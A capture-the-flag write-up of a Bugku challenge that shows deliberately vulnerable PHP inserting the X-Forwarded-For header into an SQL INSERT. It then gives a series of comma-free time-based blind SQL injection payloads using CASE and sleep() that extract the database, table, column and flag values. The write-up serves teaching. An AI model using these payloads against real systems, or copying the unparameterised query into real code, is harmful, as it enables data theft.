[Bugku] INSERT INTO injection

I have been going back over the basics lately and re-did sqli-labs, only to find a few tricks I had never written down. That reminded me of an INSERT injection challenge on bugku, so here is a write-up of it for the record.

The challenge hands out the source up front, and the hint is "write a Python script". A safe guess is that this has to be blind injection; no other kind of injection really needs a script.

<?php
error_reporting(0); // errors are suppressed, so nothing from the query ever reaches the response
function getIp()
{
    $ip = '';
    // A client-supplied header is trusted over REMOTE_ADDR: this is the injection point
    if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
    {
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    else
    {
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    // Only the part before the first comma survives, so a payload cannot contain commas
    $ip_arr = explode(',', $ip);
    return $ip_arr[0];
}

$host="localhost";
$user="";
$pass="";
$db="";
$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");
$ip = getIp();
echo 'your ip is :'.$ip; // the only output; the query result is never shown, hence a blind injection
// The header value is concatenated straight into the INSERT (deliberately vulnerable challenge code)
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);

The injection point is clear: the X-Forwarded-For HTTP header. There is filtering, so the usual error-based injections (updatexml, extractvalue) are out. Note that they would not help anyway: the page only echoes the IP and error_reporting(0) hides SQL errors, so an error-based result has nowhere to surface. Fortunately select case when ... then ... else ... end is still available, which combined with sleep() gives a time-based blind injection. The root cause is the header value being concatenated straight into the INSERT; a prepared statement would remove the bug entirely, but here the point is to exploit it.

Commas are also a problem: explode(',', $ip) keeps only $ip_arr[0], so anything after the first comma is thrown away and substr(x,1,1)/substring(x,1,1) cannot be used in their normal form. The comma-free MySQL syntax substr(x from 1 for 1) is used instead.

Start with manual testing: capture the request and add an X-Forwarded-For header. The header value lands inside values('...'), so the leading ' closes the string, and (...) appends the time-based CASE, and and '1'='1 re-balances the quotes; the row is still inserted, and the only observable is the delay.

X-Forwarded-For:127.0.0.1' and (select case when (length(database())=5) then sleep(5) else 1 end) and '1'='1

Manual testing shows the database name is 5 characters long. Next, write generic injection statements so the rest can be automated.

The payloads, in order: database name, table names, column names of flag, then the flag itself (119, 99, 102 and 99 are the ascii codes of the first characters tested, i.e. w, c, f, c):

127.0.0.1' and (select case when (ascii(substr((select database()) from 1 for 1))=119) then sleep(5) else 1 end) and '1'='1
127.0.0.1' and (select case when (length((select group_concat(table_name)from information_schema.tables where table_schema=database()))=14) then sleep(5) else 1 end) and '1'='1
127.0.0.1' and (select case when (ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema=database()) from 1 for 1))=99) then sleep(5) else 1 end) and '1'='1
127.0.0.1' and (select case when (length((select group_concat(column_name)from information_schema.columns where table_name='flag'))=4) then sleep(5) else 1 end) and '1'='1
127.0.0.1' and (select case when (ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flag') from 1 for 1))=102) then sleep(5) else 1 end) and '1'='1
127.0.0.1' and (select case when (length((select group_concat(flag)from flag))=32) then sleep(5) else 1 end) and '1'='1
127.0.0.1' and (select case when (ascii(substr((select group_concat(flag)from flag) from 1 for 1))=99) then sleep(5) else 1 end) and '1'='1

With all the payloads written out, the script is straightforward: binary-search the ascii value of each character, sending every candidate payload in the X-Forwarded-For header and timing the response.

Last modified: 12 August 2020, 10:34 AM